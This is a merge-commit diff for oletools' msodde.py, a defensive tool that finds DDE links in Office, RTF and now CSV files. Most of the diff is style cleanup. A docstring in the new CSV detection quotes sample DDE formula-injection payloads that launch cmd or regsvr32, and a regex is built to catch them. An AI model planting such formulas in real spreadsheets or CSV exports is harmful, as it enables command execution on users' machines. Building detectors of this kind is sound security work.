Commit 95ca88d297935a2de9175b92152713b64d3f6e6c

Authored by Philippe Lagadec
Committed by GitHub
2 parents 56ed93a1 874a5105

Merge pull request #241 from christian-intra2net/dde-in-csv

Dde in csv
oletools/msodde.py
... ... @@ -9,6 +9,7 @@ Supported formats:
9 9 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
10 10 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
11 11 - RTF
  12 +- CSV (exported from / imported into Excel)
12 13  
13 14 Author: Philippe Lagadec - http://www.decalage.info
14 15 License: BSD, see source code or documentation
... ... @@ -17,39 +18,72 @@ msodde is part of the python-oletools package:
17 18 http://www.decalage.info/python/oletools
18 19 """
19 20  
20   -# === LICENSE ==================================================================
  21 +# === LICENSE =================================================================
21 22  
22 23 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
23 24 # All rights reserved.
24 25 #
25   -# Redistribution and use in source and binary forms, with or without modification,
26   -# are permitted provided that the following conditions are met:
  26 +# Redistribution and use in source and binary forms, with or without
  27 +# modification, are permitted provided that the following conditions are met:
27 28 #
28   -# * Redistributions of source code must retain the above copyright notice, this
29   -# list of conditions and the following disclaimer.
  29 +# * Redistributions of source code must retain the above copyright notice,
  30 +# this list of conditions and the following disclaimer.
30 31 # * Redistributions in binary form must reproduce the above copyright notice,
31 32 # this list of conditions and the following disclaimer in the documentation
32 33 # and/or other materials provided with the distribution.
33 34 #
34   -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
35   -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
36   -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
37   -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
38   -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
39   -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
40   -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
41   -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
42   -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
43   -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  35 +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  36 +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  37 +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  38 +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
  39 +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
  40 +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
  41 +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
  42 +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
  43 +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
  44 +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  45 +# POSSIBILITY OF SUCH DAMAGE.
  46 +
  47 +# -- IMPORTS ------------------------------------------------------------------
44 48  
45 49 from __future__ import print_function
46 50  
47   -#------------------------------------------------------------------------------
  51 +import argparse
  52 +import zipfile
  53 +import os
  54 +from os.path import abspath, dirname
  55 +import sys
  56 +import json
  57 +import logging
  58 +import re
  59 +import csv
  60 +
  61 +# import lxml or ElementTree for XML parsing:
  62 +try:
  63 + # lxml: best performance for XML processing
  64 + import lxml.etree as ET
  65 +except ImportError:
  66 + import xml.etree.cElementTree as ET
  67 +
  68 +# little hack to allow absolute imports even if oletools is not installed
  69 +# Copied from olevba.py
  70 +PARENT_DIR = dirname(dirname(abspath(__file__)))
  71 +if PARENT_DIR not in sys.path:
  72 + sys.path.insert(0, PARENT_DIR)
  73 +del PARENT_DIR
  74 +
  75 +from oletools.thirdparty import olefile
  76 +from oletools import ooxml
  77 +from oletools import xls_parser
  78 +from oletools import rtfobj
  79 +
  80 +# -----------------------------------------------------------------------------
48 81 # CHANGELOG:
49 82 # 2017-10-18 v0.52 PL: - first version
50 83 # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags)
51 84 # 2017-10-23 ES: - add check for fldSimple codes
52   -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together
  85 +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE
  86 +# strings together
53 87 # 2017-10-25 CH: - add json output
54 88 # 2017-10-25 CH: - parse doc
55 89 # PL: - added logging
... ... @@ -59,10 +93,11 @@ from __future__ import print_function
59 93 # 2017-11-29 CH: - added support for xlsb files
60 94 # 2017-11-29 PL: - added support for RTF files (issue #223)
61 95 # 2017-12-07 CH: - ensure rtf file is closed
  96 +# 2018-01-05 CH: - add CSV
62 97  
63   -__version__ = '0.52dev9'
  98 +__version__ = '0.52dev10'
64 99  
65   -#------------------------------------------------------------------------------
  100 +# -----------------------------------------------------------------------------
66 101 # TODO: field codes can be in headers/footers/comments - parse these
67 102 # TODO: generalize behaviour for xlsx: find all external links (maybe rename
68 103 # command line flag for "blacklist" to "find all suspicious" or so)
... ... @@ -71,40 +106,10 @@ __version__ = '0.52dev9'
71 106 # DDE-Links
72 107 # TODO: avoid reading complete rtf file data into memory
73 108  
74   -#------------------------------------------------------------------------------
  109 +# -----------------------------------------------------------------------------
75 110 # REFERENCES:
76 111  
77 112  
78   -#--- IMPORTS ------------------------------------------------------------------
79   -
80   -import argparse
81   -import zipfile
82   -import os
83   -import sys
84   -import json
85   -import logging
86   -import re
87   -from struct import unpack
88   -
89   -# import lxml or ElementTree for XML parsing:
90   -try:
91   - # lxml: best performance for XML processing
92   - import lxml.etree as ET
93   -except ImportError:
94   - import xml.etree.cElementTree as ET
95   -
96   -# little hack to allow absolute imports even if oletools is not installed
97   -# Copied from olevba.py
98   -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
99   -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
100   -if not _parent_dir in sys.path:
101   - sys.path.insert(0, _parent_dir)
102   -
103   -from oletools.thirdparty import olefile
104   -from oletools import ooxml
105   -from oletools import xls_parser
106   -from oletools import rtfobj
107   -
108 113 # === PYTHON 2+3 SUPPORT ======================================================
109 114  
110 115 if sys.version_info[0] >= 3:
... ... @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD
123 128 TAG_W_R = "{%s}r" % NS_WORD
124 129 ATTR_W_INSTR = '{%s}instr' % NS_WORD
125 130 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD
126   -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml']
  131 +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
  132 + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
  133 + 'word/footer2.xml', 'word/comments.xml')
127 134  
128 135 # list of acceptable, harmless field instructions for blacklist field mode
129 136 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
... ... @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/
133 140 # switches_with_args, switches_without_args, format_switches)
134 141 FIELD_BLACKLIST = (
135 142 # date and time:
136   - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),
137   - ('DATE', 0, 0, '', 'hls', 'datetime'),
138   - ('EDITTIME', 0, 0, '', '', 'numeric'),
139   - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),
140   - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),
141   - ('TIME', 0, 0, '', '', 'datetime'),
  143 + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  144 + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace
  145 + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  146 + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  147 + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  148 + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
142 149 # exclude document automation (we hate the "auto" in "automation")
143 150 # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
144 151 # document information
145   - ('AUTHOR', 0, 1, '', '', 'string'),
146   - ('COMMENTS', 0, 1, '', '', 'string'),
147   - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),
148   - ('FILENAME', 0, 0, '', 'p', 'string'),
149   - ('FILESIZE', 0, 0, '', 'km', 'numeric'),
150   - ('KEYWORDS', 0, 1, '', '', 'string'),
151   - ('LASTSAVEDBY', 0, 0, '', '', 'string'),
152   - ('NUMCHARS', 0, 0, '', '', 'numeric'),
153   - ('NUMPAGES', 0, 0, '', '', 'numeric'),
154   - ('NUMWORDS', 0, 0, '', '', 'numeric'),
155   - ('SUBJECT', 0, 1, '', '', 'string'),
156   - ('TEMPLATE', 0, 0, '', 'p', 'string'),
157   - ('TITLE', 0, 1, '', '', 'string'),
  152 + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  153 + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  154 + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace
  155 + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  156 + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace
  157 + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  158 + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace
  159 + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  160 + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  161 + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  162 + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  163 + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  164 + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
158 165 # equations and formulas
159   - # exlude '=' formulae because they have different syntax
160   - ('ADVANCE', 0, 0, 'dlruxy', '', ''),
161   - ('SYMBOL', 1, 0, 'fs', 'ahju', ''),
  166 + # exclude '=' formulae because they have different syntax (and can be bad)
  167 + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace
  168 + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace
162 169 # form fields
163   - ('FORMCHECKBOX', 0, 0, '', '', ''),
164   - ('FORMDROPDOWN', 0, 0, '', '', ''),
165   - ('FORMTEXT', 0, 0, '', '', ''),
  170 + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  171 + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  172 + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
166 173 # index and tables
167   - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),
  174 + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace
168 175 # exlude RD since that imports data from other files
169   - ('TA', 0, 0, 'clrs', 'bi', ''),
170   - ('TC', 1, 0, 'fl', 'n', ''),
171   - ('TOA', 0, 0, 'bcdegls', 'fhp', ''),
172   - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),
173   - ('XE', 1, 0, 'frty', 'bi', ''),
  176 + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace
  177 + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace
  178 + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace
  179 + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace
  180 + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace
174 181 # links and references
175 182 # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
176   - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),
177   - ('CITATION', 1, 0, 'lfspvm', 'nty', ''),
  183 + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace
  184 + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace
178 185 # exclude HYPERLINK since we are allergic to URLs
179 186 # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
180 187 # exclude LINK and REF (could reference other files)
181   - ('NOTEREF', 1, 0, '', 'fhp', ''),
182   - ('PAGEREF', 1, 0, '', 'hp', ''),
183   - ('QUOTE', 1, 0, '', '', 'datetime'),
184   - ('STYLEREF', 1, 0, '', 'lnprtw', ''),
  188 + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace
  189 + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace
  190 + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
  191 + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace
185 192 # exclude all Mail Merge commands since they import data from other files
186 193 # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
187 194 # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
188 195 # Numbering
189   - ('LISTNUM', 0, 1, 'ls', '', ''),
190   - ('PAGE', 0, 0, '', '', 'numeric'),
191   - ('REVNUM', 0, 0, '', '', ''),
192   - ('SECTION', 0, 0, '', '', 'numeric'),
193   - ('SECTIONPAGES', 0, 0, '', '', 'numeric'),
194   - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),
195   - # user information
196   - ('USERADDRESS', 0, 1, '', '', 'string'),
197   - ('USERINITIALS', 0, 1, '', '', 'string'),
198   - ('USERNAME', 0, 1, '', '', 'string'),
  196 + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace
  197 + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  198 + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  199 + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  200 + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  201 + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace
  202 + # user information # pylint: disable=bad-whitespace
  203 + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  204 + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  205 + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
199 206 )
200 207  
201 208 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
202 209  
  210 +# filter modes
203 211 FIELD_FILTER_DDE = 'only dde'
204 212 FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
205 213 FIELD_FILTER_ALL = 'keep all'
... ... @@ -229,6 +237,7 @@ LOG_LEVELS = {
229 237 'critical': logging.CRITICAL
230 238 }
231 239  
  240 +
232 241 class NullHandler(logging.Handler):
233 242 """
234 243 Log Handler without output, to avoid printing messages if logging is not
... ... @@ -239,6 +248,7 @@ class NullHandler(logging.Handler):
239 248 def emit(self, record):
240 249 pass
241 250  
  251 +
242 252 def get_logger(name, level=logging.CRITICAL+1):
243 253 """
244 254 Create a suitable logger object for this module.
... ... @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1):
251 261 # First, test if there is already a logger with the same name, else it
252 262 # will generate duplicate messages (due to duplicate handlers):
253 263 if name in logging.Logger.manager.loggerDict:
254   - #NOTE: another less intrusive but more "hackish" solution would be to
  264 + # NOTE: another less intrusive but more "hackish" solution would be to
255 265 # use getLogger then test if its effective level is not default.
256 266 logger = logging.getLogger(name)
257 267 # make sure level is OK:
... ... @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode():
292 302 # try to find encoding for sys.stdout
293 303 encoding = None
294 304 try:
295   - encoding = sys.stdout.encoding # variable encoding might not exist
296   - except Exception:
  305 + encoding = sys.stdout.encoding
  306 + except AttributeError: # variable "encoding" might not exist
297 307 pass
298 308  
299 309 if encoding not in (None, '', 'ascii'):
... ... @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode():
316 326 sys.stdout = wrapper(sys.stdout)
317 327  
318 328  
319   -ensure_stdout_handles_unicode() # e.g. for print(text) in main()
  329 +if sys.version_info.major < 3:
  330 + ensure_stdout_handles_unicode() # e.g. for print(text) in main()
320 331  
321 332  
322 333 # === ARGUMENT PARSING =======================================================
... ... @@ -338,28 +349,34 @@ def existing_file(filename):
338 349  
339 350 def process_args(cmd_line_args=None):
340 351 """ parse command line arguments (given ones or per default sys.argv) """
341   - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
  352 + parser = ArgParserWithBanner(description='A python tool to detect and '
  353 + 'extract DDE links in MS Office files')
342 354 parser.add_argument("filepath", help="path of the file to be analyzed",
343 355 type=existing_file, metavar='FILE')
344 356 parser.add_argument('-j', "--json", action='store_true',
345 357 help="Output in json format. Do not use with -ldebug")
346   - parser.add_argument("--nounquote", help="don't unquote values",action='store_true')
347   - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
348   - help="logging level debug/info/warning/error/critical (default=%(default)s)")
  358 + parser.add_argument("--nounquote", help="don't unquote values",
  359 + action='store_true')
  360 + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
  361 + default=DEFAULT_LOG_LEVEL,
  362 + help="logging level debug/info/warning/error/critical "
  363 + "(default=%(default)s)")
349 364 filter_group = parser.add_argument_group(
350   - title='Filter which OpenXML field commands are returned',
351   - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
352   - '(e.g. .doc). These options are mutually exclusive, last '
353   - 'option found on command line overwrites earlier ones.')
  365 + title='Filter which OpenXML field commands are returned',
  366 + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
  367 + '(e.g. .doc). These options are mutually exclusive, last '
  368 + 'option found on command line overwrites earlier ones.')
354 369 filter_group.add_argument('-d', '--dde-only', action='store_const',
355 370 dest='field_filter_mode', const=FIELD_FILTER_DDE,
356 371 help='Return only DDE and DDEAUTO fields')
357 372 filter_group.add_argument('-f', '--filter', action='store_const',
358   - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST,
359   - help='Return all fields except harmless ones like PAGE')
  373 + dest='field_filter_mode',
  374 + const=FIELD_FILTER_BLACKLIST,
  375 + help='Return all fields except harmless ones')
360 376 filter_group.add_argument('-a', '--all-fields', action='store_const',
361 377 dest='field_filter_mode', const=FIELD_FILTER_ALL,
362   - help='Return all fields, irrespective of their contents')
  378 + help='Return all fields, irrespective of their '
  379 + 'contents')
363 380 parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
364 381  
365 382 return parser.parse_args(cmd_line_args)
... ... @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None):
368 385 # === FUNCTIONS ==============================================================
369 386  
370 387 # from [MS-DOC], section 2.8.25 (PlcFld):
371   -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
372   -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
373   -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
374   -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
375   -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
376   -# the field end character. This is the field separator. The field result is the content between the field
377   -# separator and the field end character. The field instructions are the content between the field begin
378   -# character and the field separator, if one is present, or between the field begin character and the field
379   -# end character if no separator is present. The field begin character, field end character, and field
380   -# separator are collectively referred to as field characters.
  388 +# A field consists of two parts: field instructions and, optionally, a result.
  389 +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
  390 +# with a value of 1. This is the field begin character. All fields MUST end
  391 +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
  392 +# This is the field end character. If the field has a result, then there MUST
  393 +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
  394 +# somewhere between the field begin character and the field end character. This
  395 +# is the field separator. The field result is the content between the field
  396 +# separator and the field end character. The field instructions are the content
  397 +# between the field begin character and the field separator, if one is present,
  398 +# or between the field begin character and the field end character if no
  399 +# separator is present. The field begin character, field end character, and
  400 +# field separator are collectively referred to as field characters.
381 401  
382 402  
383 403 def process_doc_field(data):
... ... @@ -387,7 +407,6 @@ def process_doc_field(data):
387 407 log.debug('processing field \'{0}\''.format(data))
388 408  
389 409 if data.lstrip().lower().startswith(u'dde'):
390   - #log.debug('--> is DDE!')
391 410 return data
392 411 elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
393 412 return data
... ... @@ -512,7 +531,6 @@ def process_doc(filepath):
512 531 return u'\n'.join(links)
513 532  
514 533  
515   -
516 534 def process_xls(filepath):
517 535 """ find dde links in excel ole file """
518 536  
... ... @@ -531,17 +549,15 @@ def process_xls(filepath):
531 549  
532 550  
533 551 def process_docx(filepath, field_filter_mode=None):
  552 + """ find dde-links (and other fields) in Word 2007+ files """
534 553 log.debug('process_docx')
535 554 all_fields = []
536   - with zipfile.ZipFile(filepath) as z:
537   - for filepath in z.namelist():
  555 + with zipfile.ZipFile(filepath) as zipper:
  556 + for filepath in zipper.namelist():
538 557 if filepath in LOCATIONS:
539   - data = z.read(filepath)
  558 + data = zipper.read(filepath)
540 559 fields = process_xml(data)
541 560 if len(fields) > 0:
542   - #print ('DDE Links in %s:'%filepath)
543   - #for f in fields:
544   - # print(f)
545 561 all_fields.extend(fields)
546 562  
547 563 # apply field command filter
... ... @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None):
560 576 .format(field_filter_mode))
561 577  
562 578 return u'\n'.join(clean_fields)
563   -
  579 +
  580 +
564 581 def process_xml(data):
  582 + """ Find dde-links and other fields in office XML data """
565 583 # parse the XML data:
566 584 root = ET.fromstring(data)
567 585 fields = []
... ... @@ -569,39 +587,41 @@ def process_xml(data):
569 587 level = 0
570 588 # find all the tags 'w:p':
571 589 # parse each for begin and end tags, to group DDE strings
572   - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags
  590 + # fldChar can be in either a w:r element, floating alone in the w:p
  591 + # or spread across w:p tags
573 592 # escape DDE if quoted etc
574 593 # (each is a chunk of a DDE link)
575 594  
576 595 for subs in root.iter(TAG_W_P):
577 596 elem = None
578   - for e in subs:
579   - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT
580   - if e.tag == TAG_W_R:
581   - for child in e:
582   - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT:
  597 + for curr_elem in subs:
  598 + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
  599 + if curr_elem.tag == TAG_W_R:
  600 + for child in curr_elem:
  601 + if child.tag == TAG_W_FLDCHAR or \
  602 + child.tag == TAG_W_INSTRTEXT:
583 603 elem = child
584 604 break
585 605 else:
586   - elem = e
587   - #this should be an error condition
  606 + elem = curr_elem
  607 + # this should be an error condition
588 608 if elem is None:
589 609 continue
590   -
591   - #check if FLDCHARTYPE and whether "begin" or "end" tag
  610 +
  611 + # check if FLDCHARTYPE and whether "begin" or "end" tag
592 612 if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None:
593 613 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin":
594   - level += 1
  614 + level += 1
595 615 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end":
596 616 level -= 1
597   - if level == 0 or level == -1 : # edge-case where level becomes -1
  617 + if level == 0 or level == -1: # edge-case; level becomes -1
598 618 fields.append(ddetext)
599 619 ddetext = u''
600   - level = 0 # reset edge-case
601   -
  620 + level = 0 # reset edge-case
  621 +
602 622 # concatenate the text of the field, if present:
603 623 if elem.tag == TAG_W_INSTRTEXT and elem.text is not None:
604   - #expand field code if QUOTED
  624 + # expand field code if QUOTED
605 625 ddetext += unquote(elem.text)
606 626  
607 627 for elem in root.iter(TAG_W_FLDSIMPLE):
... ... @@ -611,25 +631,28 @@ def process_xml(data):
611 631  
612 632 return fields
613 633  
614   -def unquote(field):
  634 +
  635 +def unquote(field):
615 636 if "QUOTE" not in field or NO_QUOTES:
616 637 return field
617   - #split into components
  638 + # split into components
618 639 parts = field.strip().split(" ")
619 640 ddestr = ""
620   - for p in parts[1:]:
621   - try:
622   - ch = chr(int(p))
  641 + for part in parts[1:]:
  642 + try:
  643 + character = chr(int(part))
623 644 except ValueError:
624   - ch = p
625   - ddestr += ch
  645 + character = part
  646 + ddestr += character
626 647 return ddestr
627 648  
  649 +
628 650 # "static variables" for field_is_blacklisted:
629 651 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
630 652 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
631 653 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
632 654  
  655 +
633 656 def field_is_blacklisted(contents):
634 657 """ Check if given field contents matches any in FIELD_BLACKLIST
635 658  
... ... @@ -651,7 +674,7 @@ def field_is_blacklisted(contents):
651 674 index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
652 675 except ValueError: # first word is no blacklisted command
653 676 return False
654   - log.debug('trying to match "{0}" to blacklist command {0}'
  677 + log.debug('trying to match "{0}" to blacklist command {1}'
655 678 .format(contents, FIELD_BLACKLIST[index]))
656 679 _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
657 680 = FIELD_BLACKLIST[index]
... ... @@ -706,14 +729,15 @@ def field_is_blacklisted(contents):
706 729 if 'numeric' in sw_format:
707 730 arg_choices = [] # too many choices to list them here
708 731 else:
709   - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents))
  732 + log.debug('unexpected switch {0} in "{1}"'
  733 + .format(switch, contents))
710 734 return False
711 735  
712 736 # if nothing went wrong sofar, the contents seems to match the blacklist
713 737 return True
714 738  
715 739  
716   -def process_xlsx(filepath, filed_filter_mode=None):
  740 +def process_xlsx(filepath):
717 741 """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
718 742 dde_links = []
719 743 parser = ooxml.XmlParser(filepath)
... ... @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None):
733 757 try:
734 758 logging.info('Parsing non-xml subfile {0} with content type {1}'
735 759 .format(subfile, content_type))
736   - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile):
  760 + for record in xls_parser.parse_xlsb_part(handle, content_type,
  761 + subfile):
737 762 logging.debug('{0}: {1}'.format(subfile, record))
738 763 if isinstance(record, xls_parser.XlsbBeginSupBook) and \
739 764 record.link_type == \
... ... @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser):
791 816  
792 817 RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent
793 818  
  819 +
794 820 def process_rtf(file_handle, field_filter_mode=None):
795   - log.debug('process_rtf')
  821 + """ find dde links or other fields in rtf file """
796 822 all_fields = []
797 823 data = RTF_START + file_handle.read() # read complete file into memory!
798 824 file_handle.close()
... ... @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None):
818 844 return u'\n'.join(clean_fields)
819 845  
820 846  
  847 +# threshold when to consider a csv file "small"; also used as sniffing size
  848 +CSV_SMALL_THRESH = 1024
  849 +
  850 +# format of dde link: program-name | arguments ! unimportant
  851 +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
  852 +
  853 +# allowed delimiters (python sniffer would use nearly any char). Taken from
  854 +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
  855 +CSV_DELIMITERS = ',\t ;|^'
  856 +
  857 +
  858 +def process_csv(filepath):
  859 + """ find dde in csv text
  860 +
  861 + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
  862 + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
  863 +
  864 + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
  865 + chars the same way that excel does. Tested to some extent in unittests.
  866 +
  867 + This can only find DDE-links, no other "suspicious" constructs (yet).
  868 + """
  869 +
  870 + results = []
  871 + with open(filepath, 'r') as file_handle:
  872 + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
  873 + is_small = file_handle.tell() < CSV_SMALL_THRESH
